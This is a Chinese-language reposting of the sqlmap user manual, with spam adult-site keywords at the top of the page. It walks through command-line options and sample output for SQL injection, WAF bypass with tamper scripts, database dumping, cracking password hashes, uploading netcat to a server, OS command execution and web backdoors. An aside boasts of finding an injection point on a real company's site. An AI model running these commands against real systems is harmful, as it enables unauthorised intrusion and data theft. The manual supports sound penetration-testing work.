日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

sqlmap手册

發布時間:2023/11/29 编程问答 42 豆豆
生活随笔 收集整理的這篇文章主要介紹了 sqlmap手册 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

sqlmap用戶手冊 | by WooYun知識庫

sqlmap用戶手冊?

===================================================================

當給sqlmap這么一個url (http://192.168.136.131/sqlmap/mysql/get_int.php?id=1) 的時候,它會:

1、判斷可注入的參數 2、判斷可以用那種SQL注入技術來注入 3、識別出哪種數據庫 4、根據用戶選擇,讀取哪些數據

?

sqlmap支持五種不同的注入模式:

1、基于布爾的盲注,即可以根據返回頁面判斷條件真假的注入。 2、基于時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。 3、基于報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。 4、聯合查詢注入,可以使用union的情況下的注入。 5、堆查詢注入,可以同時執行多條語句的執行時的注入。

sqlmap支持的數據庫有:

MySQL,?Oracle,?PostgreSQL,?Microsoft?SQL?Server,?Microsoft?Access,?IBM?DB2,?SQLite,?Firebird,?Sybase和SAP?MaxDB

可以提供一個簡單的URL,Burp或WebScarab請求日志文件,文本文檔中的完整http請求或者Google的搜索,匹配出結果頁面,也可以自己定義一個正則來判斷那個地址去測試。

測試GET參數,POST參數,HTTP Cookie參數,HTTP User-Agent頭和HTTP Referer頭來確認是否有SQL注入,它也可以指定用逗號分隔的列表的具體參數來測試。

可以設定HTTP(S)請求的并發數,來提高盲注時的效率。

Youtube上有人做的使用sqlmap的視頻:

http://www.youtube.com/user/inquisb/videos

http://www.youtube.com/user/stamparm/videos

使用sqlmap的實例文章:

http://unconciousmind.blogspot.com/search/label/sqlmap

可以點擊https://github.com/sqlmapproject/sqlmap/tarball/master下載最新版本sqlmap。

也可以使用git來獲取sqlmap

git?clone?https://github.com/sqlmapproject/sqlmap.git?sqlmap-dev

之后可以直接使用命令來更新

python?sqlmap.py?--update

或者

git?pull

更新sqlmap

如果你想觀察sqlmap對一個點是進行了怎樣的嘗試判斷以及讀取數據的,可以使用-v參數。

共有七個等級,默認為1:

0、只顯示python錯誤以及嚴重的信息。 1、同時顯示基本信息和警告信息。(默認) 2、同時顯示debug信息。3、同時顯示注入的payload。4、同時顯示HTTP請求。 5、同時顯示HTTP響應頭。 6、同時顯示HTTP響應頁面。

如果你想看到sqlmap發送的測試payload最好的等級就是3。

獲取目標方式


目標URL

參數:-u或者--url

格式:http(s)://targeturl[:port]/[…]

例如:python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

從Burp或者WebScarab代理中獲取日志

參數:-l

可以直接吧Burp proxy或者WebScarab proxy中的日志直接倒出來交給sqlmap來一個一個檢測是否有注入。

從文本中獲取多個目標掃描

參數:-m

文件中保存url格式如下,sqlmap會一個一個檢測

www.target1.com/vuln1.php?q=foobar www.target2.com/vuln2.asp?id=1 www.target3.com/vuln3/id/1*

從文件中加載HTTP請求

參數:-r

sqlmap可以從一個文本文件中獲取HTTP請求,這樣就可以跳過設置一些其他參數(比如cookie,POST數據,等等)。

比如文本文件內如下:

POST?/vuln.php?HTTP/1.1 Host:?www.target.com User-Agent:?Mozilla/4.0 id=1

當請求是HTTPS的時候你需要配合這個--force-ssl參數來使用,或者你可以在Host頭后門加上:443

處理Google的搜索結果

參數:-g

sqlmap可以測試注入Google的搜索結果中的GET參數(只獲取前100個結果)。

例子:

python?sqlmap.py?-g?"inurl:\".php?id=1\""

(很牛B的功能,測試了一下,第十幾個就找到新浪的一個注入點)

此外可以使用-c參數加載sqlmap.conf文件里面的相關配置。

請求


http數據

參數:--data

此參數是把數據以POST方式提交,sqlmap會像檢測GET參數一樣檢測POST的參數。

例子:

python?sqlmap.py?-u?"http://www.target.com/vuln.php"?--data="id=1"?-f?--banner?--dbs?--users

參數拆分字符

參數:--param-del

當GET或POST的數據需要用其他字符分割測試參數的時候需要用到此參數。

例子:

python?sqlmap.py?-u?"http://www.target.com/vuln.php"?--data="query=foobar;id=1"?--param-del=";"?-f?--banner?--dbs?--users

HTTP cookie頭

參數:--cookie,--load-cookies,--drop-set-cookie

這個參數在以下兩個方面很有用:

1、web應用需要登陸的時候。

2、你想要在這些頭參數中測試SQL注入時。

可以通過抓包把cookie獲取到,復制出來,然后加到--cookie參數里。

在HTTP請求中,遇到Set-Cookie的話,sqlmap會自動獲取并且在以后的請求中加入,并且會嘗試SQL注入。

如果你不想接受Set-Cookie可以使用--drop-set-cookie參數來拒接。

當你使用--cookie參數時,當返回一個Set-Cookie頭的時候,sqlmap會詢問你用哪個cookie來繼續接下來的請求。當--level的參數設定為2或者2以上的時候,sqlmap會嘗試注入Cookie參數。

HTTP User-Agent頭

參數:--user-agent,--random-agent

默認情況下sqlmap的HTTP請求頭中User-Agent值是:

sqlmap/1.0-dev-xxxxxxx?(http://sqlmap.org)

可以使用--user-anget參數來修改,同時也可以使用--random-agnet參數來隨機的從./txt/user-agents.txt中獲取。

當--level參數設定為3或者3以上的時候,會嘗試對User-Angent進行注入。

HTTP Referer頭

參數:--referer

sqlmap可以在請求中偽造HTTP中的referer,當--level參數設定為3或者3以上的時候會嘗試對referer注入。

額外的HTTP頭

參數:--headers

可以通過--headers參數來增加額外的http頭

HTTP認證保護

參數:--auth-type,--auth-cred

這些參數可以用來登陸HTTP的認證保護支持三種方式:

1、Basic

2、Digest

3、NTLM

例子:

python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1"?--auth-type?Basic?--auth-cred?"testuser:testpass"

HTTP協議的證書認證

參數:--auth-cert

當Web服務器需要客戶端證書進行身份驗證時,需要提供兩個文件:key_file,cert_file。

key_file是格式為PEM文件,包含著你的私鑰,cert_file是格式為PEM的連接文件。

HTTP(S)代理

參數:--proxy,--proxy-cred和--ignore-proxy

使用--proxy代理是格式為:http://url:port。

當HTTP(S)代理需要認證是可以使用--proxy-cred參數:username:password。

--ignore-proxy拒絕使用本地局域網的HTTP(S)代理。

HTTP請求延遲

參數:--delay

可以設定兩個HTTP(S)請求間的延遲,設定為0.5的時候是半秒,默認是沒有延遲的。

設定超時時間

參數:--timeout

可以設定一個HTTP(S)請求超過多久判定為超時,10.5表示10.5秒,默認是30秒。

設定重試超時

參數:--retries

當HTTP(S)超時時,可以設定重新嘗試連接次數,默認是3次。

設定隨機改變的參數值

參數:--randomize

可以設定某一個參數值在每一次請求中隨機的變化,長度和類型會與提供的初始值一樣。

利用正則過濾目標網址

參數:--scope

例如:

python?sqlmap.py?-l?burp.log?--scope="(www)?\.target\.(com|net|org)"

避免過多的錯誤請求被屏蔽

參數:--safe-url,--safe-freq

有的web應用程序會在你多次訪問錯誤的請求時屏蔽掉你以后的所有請求,這樣在sqlmap進行探測或者注入的時候可能造成錯誤請求而觸發這個策略,導致以后無法進行。

繞過這個策略有兩種方式:

1、--safe-url:提供一個安全不錯誤的連接,每隔一段時間都會去訪問一下。 2、--safe-freq:提供一個安全不錯誤的連接,每次測試請求之后都會再訪問一邊安全連接。

關掉URL參數值編碼

參數:--skip-urlencode

根據參數位置,他的值默認將會被URL編碼,但是有些時候后端的web服務器不遵守RFC標準,只接受不經過URL編碼的值,這時候就需要用--skip-urlencode參數。

每次請求時候執行自定義的python代碼

參數:--eval

在有些時候,需要根據某個參數的變化,而修改另個一參數,才能形成正常的請求,這時可以用--eval參數在每次請求時根據所寫python代碼做完修改后請求。

例子:

python?sqlmap.py?-u?"http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b"?--eval="import?hashlib;hash=hashlib.md5(id).hexdigest()"

上面的請求就是每次請求時根據id參數值,做一次md5后作為hash參數的值。

注入


測試參數

參數:-p,--skip

sqlmap默認測試所有的GET和POST參數,當--level的值大于等于2的時候也會測試HTTP Cookie頭的值,當大于等于3的時候也會測試User-Agent和HTTP Referer頭的值。但是你可以手動用-p參數設置想要測試的參數。例如: -p "id,user-anget"

當你使用--level的值很大但是有個別參數不想測試的時候可以使用--skip參數。

例如:--skip="user-angent.referer"

在有些時候web服務器使用了URL重寫,導致無法直接使用sqlmap測試參數,可以在想測試的參數后面加*

例如:

python?sqlmap.py?-u?"http://targeturl/param1/value1*/param2/value2/"

sqlmap將會測試value1的位置是否可注入。

指定數據庫

參數:--dbms

默認情況系sqlmap會自動的探測web應用后端的數據庫是什么,sqlmap支持的數據庫有:

MySQL、Oracle、PostgreSQL、Microsoft?SQL?Server、Microsoft?Access、SQLite、Firebird、Sybase、SAP?MaxDB、DB2

指定數據庫服務器系統

參數:--os

默認情況下sqlmap會自動的探測數據庫服務器系統,支持的系統有:Linux、Windows。

指定無效的大數字

參數:--invalid-bignum

當你想指定一個報錯的數值時,可以使用這個參數,例如默認情況系id=13,sqlmap會變成id=-13來報錯,你可以指定比如id=9999999來報錯。

指定無效的邏輯

參數:--invalid-logical

原因同上,可以指定id=13把原來的id=-13的報錯改成id=13 AND 18=19。

注入payload

參數:--prefix,--suffix

在有些環境中,需要在注入的payload的前面或者后面加一些字符,來保證payload的正常執行。

例如,代碼中是這樣調用數據庫的:

$query?=?"SELECT?*?FROM?users?WHERE?id=(’"?.?$_GET[’id’]?.?"’)?LIMIT?0,?1";

這時你就需要--prefix和--suffix參數了:

python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1"?-p?id?--prefix?"’)"?--suffix?"AND?(’abc’=’abc"

這樣執行的SQL語句變成:

$query?=?"SELECT?*?FROM?users?WHERE?id=(’1’)?<PAYLOAD>?AND?(’abc’=’abc’)?LIMIT?0,?1";

修改注入的數據

參數:--tamper

sqlmap除了使用CHAR()函數來防止出現單引號之外沒有對注入的數據修改,你可以使用--tamper參數對數據做修改來繞過WAF等設備。

下面是一個tamper腳本的格式:

#?Needed?imports from?lib.core.enums?import?PRIORITY #?Define?which?is?the?order?of?application?of?tamper?scripts?against #?the?payload __priority__?=?PRIORITY.NORMAL def?tamper(payload):'''????Description?of?your?tamper?script'''????retVal?=?payload#?your?code?to?tamper?the?original?payload#?return?the?tampered?payloadreturn?retVal

可以查看 tamper/ 目錄下的有哪些可用的腳本

例如:

$?python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/mysql/get_int.php?id=1"?--tamper?tamper/between.py,tamper/randomcase.py,tamper/space2comment.py?-v?3 [hh:mm:03]?[DEBUG]?cleaning?up?configuration?parameters [hh:mm:03]?[INFO]?loading?tamper?script?'between'[hh:mm:03]?[INFO]?loading?tamper?script?'randomcase'[hh:mm:03]?[INFO]?loading?tamper?script?'space2comment'[...] [hh:mm:04]?[INFO]?testing?'AND?boolean-based?blind?-?WHERE?or?HAVING?clause'[hh:mm:04]?[PAYLOAD]?1)/**/And/**/1369=7706/**/And/**/(4092=4092 [hh:mm:04]?[PAYLOAD]?1)/**/AND/**/9267=9267/**/AND/**/(4057=4057 [hh:mm:04]?[PAYLOAD]?1/**/AnD/**/950=7041 [...] [hh:mm:04]?[INFO]?testing?'MySQL?>=?5.0?AND?error-based?-?WHERE?or?HAVING?clause'[hh:mm:04]?[PAYLOAD]?1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar( 58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/ ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/ group/**/bY/**/x)a) [hh:mm:04]?[INFO]?GET?parameter?'id'?is?'MySQL?>=?5.0?AND?error-based?-?WHERE?or?HAVING clause'?injectable [...]

探測


探測等級

參數:--level

共有五個等級,默認為1,sqlmap使用的payload可以在xml/payloads.xml中看到,你也可以根據相應的格式添加自己的payload。

這個參數不僅影響使用哪些payload同時也會影響測試的注入點,GET和POST的數據都會測試,HTTP Cookie在level為2的時候就會測試,HTTP User-Agent/Referer頭在level為3的時候就會測試。

總之在你不確定哪個payload或者參數為注入點的時候,為了保證全面性,建議使用高的level值。

風險等級

參數:--risk

共有四個風險等級,默認是1會測試大部分的測試語句,2會增加基于事件的測試語句,3會增加OR語句的SQL注入測試。

在有些時候,例如在UPDATE的語句中,注入一個OR的測試語句,可能導致更新的整個表,可能造成很大的風險。

測試的語句同樣可以在xml/payloads.xml中找到,你也可以自行添加payload。

頁面比較

參數:--string,--not-string,--regexp,--code

默認情況下sqlmap通過判斷返回頁面的不同來判斷真假,但有時候這會產生誤差,因為有的頁面在每次刷新的時候都會返回不同的代碼,比如頁面當中包含一個動態的廣告或者其他內容,這會導致sqlmap的誤判。此時用戶可以提供一個字符串或者一段正則匹配,在原始頁面與真條件下的頁面都存在的字符串,而錯誤頁面中不存在(使用--string參數添加字符串,--regexp添加正則),同時用戶可以提供一段字符串在原始頁面與真條件下的頁面都不存在的字符串,而錯誤頁面中存在的字符串(--not-string添加)。用戶也可以提供真與假條件返回的HTTP狀態碼不一樣來注入,例如,響應200的時候為真,響應401的時候為假,可以添加參數--code=200。

參數:--text-only,--titles

有些時候用戶知道真條件下的返回頁面與假條件下返回頁面是不同位置在哪里可以使用--text-only(HTTP響應體中不同)--titles(HTML的title標簽中不同)。

注入技術


測試是否是注入

參數:--technique

這個參數可以指定sqlmap使用的探測技術,默認情況下會測試所有的方式。

支持的探測方式如下:

B:?Boolean-based?blind?SQL?injection(布爾型注入) E:?Error-based?SQL?injection(報錯型注入) U:?UNION?query?SQL?injection(可聯合查詢注入) S:?Stacked?queries?SQL?injection(可多語句查詢注入) T:?Time-based?blind?SQL?injection(基于時間延遲注入)

設定延遲注入的時間

參數:--time-sec

當使用基于時間的盲注時,時刻使用--time-sec參數設定延時時間,默認是5秒。

設定UNION查詢字段數

參數:--union-cols

默認情況下sqlmap測試UNION查詢注入會測試1-10個字段數,當--level為5的時候他會增加測試到50個字段數。設定--union-cols的值應該是一段整數,如:12-16,是測試12-16個字段數。

設定UNION查詢使用的字符

參數:--union-char

默認情況下sqlmap針對UNION查詢的注入會使用NULL字符,但是有些情況下會造成頁面返回失敗,而一個隨機整數是成功的,這是你可以用--union-char只定UNION查詢的字符。

二階SQL注入

參數:--second-order

有些時候注入點輸入的數據看返回結果的時候并不是當前的頁面,而是另外的一個頁面,這時候就需要你指定到哪個頁面獲取響應判斷真假。--second-order后門跟一個判斷頁面的URL地址。

列數據


合并起來使用:-current-user?--current-db?--is-dba?--users

標志

參數:-b,--banner

大多數的數據庫系統都有一個函數可以返回數據庫的版本號,通常這個函數是version()或者變量@@version這主要取決與是什么數據庫。

用戶

參數:-current-user

在大多數據庫中可以獲取到管理數據的用戶。

當前數據庫

參數:--current-db

返還當前連接的數據庫。

當前用戶是否為管理用

參數:--is-dba

判斷當前的用戶是否為管理,是的話會返回True。

列數據庫管理用戶

參數:--users

當前用戶有權限讀取包含所有用戶的表的權限時,就可以列出所有管理用戶。

列出并破解數據庫用戶的hash

參數:--passwords

當前用戶有權限讀取包含用戶密碼的表的權限時,sqlmap會現列舉出用戶,然后列出hash,并嘗試破解。

例子:

$?python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1"?--passwords?-v?1 [...] back-end?DBMS:?PostgreSQL [hh:mm:38]?[INFO]?fetching?database?users?password?hashes do?you?want?to?use?dictionary?attack?on?retrieved?password?hashes??[Y/n/q]?y [hh:mm:42]?[INFO]?using?hash?method:?'postgres_passwd'what's?the?dictionary's?location??[/software/sqlmap/txt/wordlist.txt] [hh:mm:46]?[INFO]?loading?dictionary?from:?'/software/sqlmap/txt/wordlist.txt'do?you?want?to?use?common?password?suffixes??(slow!)?[y/N]?n [hh:mm:48]?[INFO]?starting?dictionary?attack?(postgres_passwd) [hh:mm:49]?[INFO]?found:?'testpass'?for?user:?'testuser'[hh:mm:50]?[INFO]?found:?'testpass'?for?user:?'postgres'database?management?system?users?password?hashes: [*]?postgres?[1]:password?hash:?md5d7d880f96044b72d0bba108ace96d1e4clear-text?password:?testpass [*]?testuser?[1]:password?hash:?md599e5ea7a6f7c3269995cba3927fd0093clear-text?password:?testpass

可以看到sqlmap不僅識別出數據庫的用戶跟密碼,同時也識別出是PostgreSQL數據庫,并詢問用戶是否采用字典爆破的方式進行破解,這個爆破已經支持Oracle和Microsoft SQL Server。

也可以提供-U參數來指定爆破哪個用戶的hash。

列出數據庫管理員權限

參數:--privileges

當前用戶有權限讀取包含所有用戶的表的權限時,很可能列舉出每個用戶的權限,sqlmap將會告訴你哪個是數據庫的超級管理員。也可以用-U參數指定你想看哪個用戶的權限。

列出數據庫管理員角色

參數:--roles

當前用戶有權限讀取包含所有用戶的表的權限時,很可能列舉出每個用戶的角色,也可以用-U參數指定你想看哪個用戶的角色。

僅適用于當前數據庫是Oracle的時候。

列出數據庫系統的數據庫

參數:--dbs

當前用戶有權限讀取包含所有數據庫列表信息的表中的時候,即可列出所有的數據庫。

列舉數據庫表

參數:--tables,--exclude-sysdbs,-D

當前用戶有權限讀取包含所有數據庫表信息的表中的時候,即可列出一個特定數據的所有表。

如果你不提供-D參數來列指定的一個數據的時候,sqlmap會列出數據庫所有庫的所有表。

--exclude-sysdbs參數是指包含了所有的系統數據庫。

需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是數據庫名稱。

列舉數據庫表中的字段

參數:--columns,-C,-T,-D

當前用戶有權限讀取包含所有數據庫表信息的表中的時候,即可列出指定數據庫表中的字段,同時也會列出字段的數據類型。

如果沒有使用-D參數指定數據庫時,默認會使用當前數據庫。

列舉一個SQLite的例子:

$?python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1"?--columns?-D?testdb?-T?users?-C?name [...] Database:?SQLite_masterdb Table:?users [3?columns] +---------+---------+ |?Column??|?Type????| +---------+---------+ |?id??????|?INTEGER?| |?name????|?TEXT????| |?surname?|?TEXT????| +---------+---------+

列舉數據庫系統的架構

參數:--schema,--exclude-sysdbs

用戶可以用此參數獲取數據庫的架構,包含所有的數據庫,表和字段,以及各自的類型。

加上--exclude-sysdbs參數,將不會獲取數據庫自帶的系統庫內容。

MySQL例子:

$?python?sqlmap.py?-u?"http://192.168.48.130/sqlmap/mysql/get_int.php?id=1"?--schema?--batch?--exclude-sysdbs [...] Database:?owasp10 Table:?accounts [4?columns] +-------------+---------+ |?Column??????|?Type????| +-------------+---------+ |?cid?????????|?int(11)?| |?mysignature?|?text????| |?password????|?text????| |?username????|?text????| +-------------+---------+ Database:?owasp10 Table:?blogs_table [4?columns] +--------------+----------+ |?Column???????|?Type?????| +--------------+----------+ |?date?????????|?datetime?| |?blogger_name?|?text?????| |?cid??????????|?int(11)??| |?comment??????|?text?????| +--------------+----------+ Database:?owasp10 Table:?hitlog [6?columns] +----------+----------+ |?Column???|?Type?????| +----------+----------+ |?date?????|?datetime?| |?browser??|?text?????| |?cid??????|?int(11)??| |?hostname?|?text?????| |?ip???????|?text?????| |?referer??|?text?????| +----------+----------+ Database:?testdb Table:?users [3?columns] +---------+---------------+ |?Column??|?Type??????????| +---------+---------------+ |?id??????|?int(11)???????| |?name????|?varchar(500)??| |?surname?|?varchar(1000)?| +---------+---------------+ [...]

獲取表中數據個數

參數:--count

有時候用戶只想獲取表中的數據個數而不是具體的內容,那么就可以使用這個參數。

列舉一個Microsoft SQL Server例子:

$?python?sqlmap.py?-u?"http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"?--count?-D?testdb [...] Database:?testdb +----------------+---------+ |?Table??????????|?Entries?| +----------------+---------+ |?dbo.users??????|?4???????| |?dbo.users_blob?|?2???????| +----------------+---------+

獲取整個表的數據

參數:--dump,-C,-T,-D,--start,--stop,--first,--last

如果當前管理員有權限讀取數據庫其中的一個表的話,那么就能獲取整個表的所有內容。

使用-D,-T參數指適定想要獲取哪個庫的哪個表,不用-D參數時,默認使用當前庫。

列舉一個Firebird的例子:

$?python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/firebird/get_int.php?id=1"?--dump?-T?users [...] Database:?Firebird_masterdb Table:?USERS [4?entries] +----+--------+------------+ |?ID?|?NAME???|?SURNAME????| +----+--------+------------+ |?1??|?luther?|?blisset????| |?2??|?fluffy?|?bunny??????| |?3??|?wu?????|?ming???????| |?4??|?NULL???|?nameisnull?| +----+--------+------------+

可以獲取指定庫中的所有表的內容,只用-dump跟-D參數(不使用-T與-C參數)。

也可以用-dump跟-C獲取指定的字段內容。

sqlmap為每個表生成了一個CSV文件。

如果你只想獲取一段數據,可以使用--start和--stop參數,例如,你只想獲取第一段數據可hi使用--stop 1,如果想獲取第二段與第三段數據,使用參數 --start 1 --stop 3。

也可以用--first與--last參數,獲取第幾個字符到第幾個字符的內容,如果你想獲取字段中地三個字符到第五個字符的內容,使用--first 3 --last 5,只在盲注的時候使用,因為其他方式可以準確的獲取注入內容,不需要一個字符一個字符的猜解。

獲取所有數據庫表的內容

參數:--dump-all,--exclude-sysdbs

使用--dump-all參數獲取所有數據庫表的內容,可同時加上--exclude-sysdbs只獲取用戶數據庫的表,需要注意在Microsoft SQL Server中master數據庫沒有考慮成為一個系統數據庫,因為有的管理員會把他當初用戶數據庫一樣來使用它。

搜索字段,表,數據庫

參數:--search,-C,-T,-D

--search可以用來尋找特定的數據庫名,所有數據庫中的特定表名,所有數據庫表中的特定字段。

可以在一下三種情況下使用:

-C后跟著用逗號分割的列名,將會在所有數據庫表中搜索指定的列名。 -T后跟著用逗號分割的表名,將會在所有數據庫中搜索指定的表名 -D后跟著用逗號分割的庫名,將會在所有數據庫中搜索指定的庫名。

運行自定義的SQL語句

參數:--sql-query,--sql-shell

sqlmap會自動檢測確定使用哪種SQL注入技術,如何插入檢索語句。

如果是SELECT查詢語句,sqlap將會輸出結果。如果是通過SQL注入執行其他語句,需要測試是否支持多語句執行SQL語句。

列舉一個Mircrosoft SQL Server 2000的例子:

$?python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/mssql/get_int.php?id=1"?--sql-query?"SELECT?'foo'"?-v?1 [...] [hh:mm:14]?[INFO]?fetching?SQL?SELECT?query?output:?'SELECT?'foo''[hh:mm:14]?[INFO]?retrieved:?foo SELECT?'foo':????'foo'$?python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/mssql/get_int.php?id=1"?--sql-query?"SELECT?'foo',?'bar'"?-v?2 [...] [hh:mm:50]?[INFO]?fetching?SQL?SELECT?query?output:?'SELECT?'foo',?'bar''[hh:mm:50]?[INFO]?the?SQL?query?provided?has?more?than?a?field.?sqlmap?will?now?unpack?it?into?distinct?queries?to?be?able?to?retrieve?the?output?even?if?we?are?going?blind [hh:mm:50]?[DEBUG]?query:?SELECT?ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111))?AS?VARCHAR(8000)),?(CHAR(32))) [hh:mm:50]?[INFO]?retrieved:?foo [hh:mm:50]?[DEBUG]?performed?27?queries?in?0?seconds [hh:mm:50]?[DEBUG]?query:?SELECT?ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114))?AS?VARCHAR(8000)),?(CHAR(32))) [hh:mm:50]?[INFO]?retrieved:?bar [hh:mm:50]?[DEBUG]?performed?27?queries?in?0?seconds SELECT?'foo',?'bar':????'foo,?bar'

爆破


暴力破解表名

參數:--common-tables

當使用--tables無法獲取到數據庫的表時,可以使用此參數。

通常是如下情況:

1、MySQL數據庫版本小于5.0,沒有information_schema表。 2、數據庫是Microssoft?Access,系統表MSysObjects是不可讀的(默認)。 3、當前用戶沒有權限讀取系統中保存數據結構的表的權限。

暴力破解的表在txt/common-tables.txt文件中,你可以自己添加。

列舉一個MySQL 4.1的例子:

$?python?sqlmap.py?-u?"http://192.168.136.129/mysql/get_int_4.php?id=1"?--common-tables?-D?testdb?--banner [...] [hh:mm:39]?[INFO]?testing?MySQL [hh:mm:39]?[INFO]?confirming?MySQL [hh:mm:40]?[INFO]?the?back-end?DBMS?is?MySQL [hh:mm:40]?[INFO]?fetching?banner web?server?operating?system:?Windows web?application?technology:?PHP?5.3.1,?Apache?2.2.14 back-end?DBMS?operating?system:?Windows back-end?DBMS:?MySQL?&lt;?5.0.0 banner:????'4.1.21-community-nt'[hh:mm:40]?[INFO]?checking?table?existence?using?items?from?'/software/sqlmap/txt/common-tables.txt'[hh:mm:40]?[INFO]?adding?words?used?on?web?page?to?the?check?list please?enter?number?of?threads??[Enter?for?1?(current)]?8 [hh:mm:43]?[INFO]?retrieved:?users Database:?testdb [1?table] +-------+ |?users?| +-------+

暴力破解列名

參數:--common-columns

與暴力破解表名一樣,暴力跑的列名在txt/common-columns.txt中。

用戶自定義函數注入


參數:--udf-inject,--shared-lib

你可以通過編譯MySQL注入你自定義的函數(UDFs)或PostgreSQL在windows中共享庫,DLL,或者Linux/Unix中共享對象,sqlmap將會問你一些問題,上傳到服務器數據庫自定義函數,然后根據你的選擇執行他們,當你注入完成后,sqlmap將會移除它們。

系統文件操作


從數據庫服務器中讀取文件

參數:--file-read

當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。讀取的文件可以是文本也可以是二進制文件。

列舉一個Microsoft SQL Server 2005的例子:

$?python?sqlmap.py?-u?"http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther"?\ --file-read?"C:/example.exe"?-v?1 [...] [hh:mm:49]?[INFO]?the?back-end?DBMS?is?Microsoft?SQL?Server web?server?operating?system:?Windows?2000 web?application?technology:?ASP.NET,?Microsoft?IIS?6.0,?ASP back-end?DBMS:?Microsoft?SQL?Server?2005 [hh:mm:50]?[INFO]?fetching?file:?'C:/example.exe'[hh:mm:50]?[INFO]?the?SQL?query?provided?returns?3?entries C:/example.exe?file?saved?to:????'/software/sqlmap/output/192.168.136.129/files/C__example.exe'[...] $?ls?-l?output/192.168.136.129/files/C__example.exe?-rw-r--r--?1?inquis?inquis?2560?2011-MM-DD?hh:mm?output/192.168.136.129/files/C__example.exe $?file?output/192.168.136.129/files/C__example.exe?output/192.168.136.129/files/C__example.exe:?PE32?executable?for?MS?Windows?(GUI)?Intel 80386?32-bit

把文件上傳到數據庫服務器中

參數:--file-write,--file-dest

當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。上傳的文件可以是文本也可以是二進制文件。

列舉一個MySQL的例子:

$?file?/software/nc.exe.packed?/software/nc.exe.packed:?PE32?executable?for?MS?Windows?(console)?Intel?80386?32-bit $?ls?-l?/software/nc.exe.packed -rwxr-xr-x?1?inquis?inquis?31744?2009-MM-DD?hh:mm?/software/nc.exe.packed $?python?sqlmap.py?-u?"http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1"?--file-write?\ "/software/nc.exe.packed"?--file-dest?"C:/WINDOWS/Temp/nc.exe"?-v?1 [...] [hh:mm:29]?[INFO]?the?back-end?DBMS?is?MySQL web?server?operating?system:?Windows?2003?or?2008 web?application?technology:?ASP.NET,?Microsoft?IIS?6.0,?ASP.NET?2.0.50727 back-end?DBMS:?MySQL?&gt;=?5.0.0 [...] do?you?want?confirmation?that?the?file?'C:/WINDOWS/Temp/nc.exe'?has?been?successfully?written?on?the?back-end?DBMS?file?system??[Y/n]?y [hh:mm:52]?[INFO]?retrieved:?31744 [hh:mm:52]?[INFO]?the?file?has?been?successfully?written?and?its?size?is?31744?bytes,?same?size?as?the?local?file?'/software/nc.exe.packed'

運行任意操作系統命令

參數:--os-cmd,--os-shell

當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。

在MySQL、PostgreSQL,sqlmap上傳一個二進制庫,包含用戶自定義的函數,sys_exec()和sys_eval()。

那么他創建的這兩個函數可以執行系統命令。在Microsoft SQL Server,sqlmap將會使用xp_cmdshell存儲過程,如果被禁(在Microsoft SQL Server 2005及以上版本默認禁制),sqlmap會重新啟用它,如果不存在,會自動創建。

列舉一個PostgreSQL的例子:

$?python?sqlmap.py?-u?"http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1"?\ --os-cmd?id?-v?1 [...] web?application?technology:?PHP?5.2.6,?Apache?2.2.9 back-end?DBMS:?PostgreSQL [hh:mm:12]?[INFO]?fingerprinting?the?back-end?DBMS?operating?system [hh:mm:12]?[INFO]?the?back-end?DBMS?operating?system?is?Linux [hh:mm:12]?[INFO]?testing?if?current?user?is?DBA [hh:mm:12]?[INFO]?detecting?back-end?DBMS?version?from?its?banner [hh:mm:12]?[INFO]?checking?if?UDF?'sys_eval'?already?exist [hh:mm:12]?[INFO]?checking?if?UDF?'sys_exec'?already?exist [hh:mm:12]?[INFO]?creating?UDF?'sys_eval'?from?the?binary?UDF?file [hh:mm:12]?[INFO]?creating?UDF?'sys_exec'?from?the?binary?UDF?file do?you?want?to?retrieve?the?command?standard?output??[Y/n/a]?ycommand?standard?output:????'uid=104(postgres)?gid=106(postgres)?groups=106(postgres)'[hh:mm:19]?[INFO]?cleaning?up?the?database?management?system do?you?want?to?remove?UDF?'sys_eval'??[Y/n]?y do?you?want?to?remove?UDF?'sys_exec'??[Y/n]?y [hh:mm:23]?[INFO]?database?management?system?cleanup?finished [hh:mm:23]?[WARNING]?remember?that?UDF?shared?object?files?saved?on?the?file?system?can?only?be?deleted?manually

用--os-shell參數也可以模擬一個真實的shell,可以輸入你想執行的命令。

當不能執行多語句的時候(比如php或者asp的后端數據庫為MySQL時),仍然可能使用INTO OUTFILE寫進可寫目錄,來創建一個web后門。支持的語言:

1、ASP 2、ASP.NET 3、JSP 4、PHP

Meterpreter配合使用

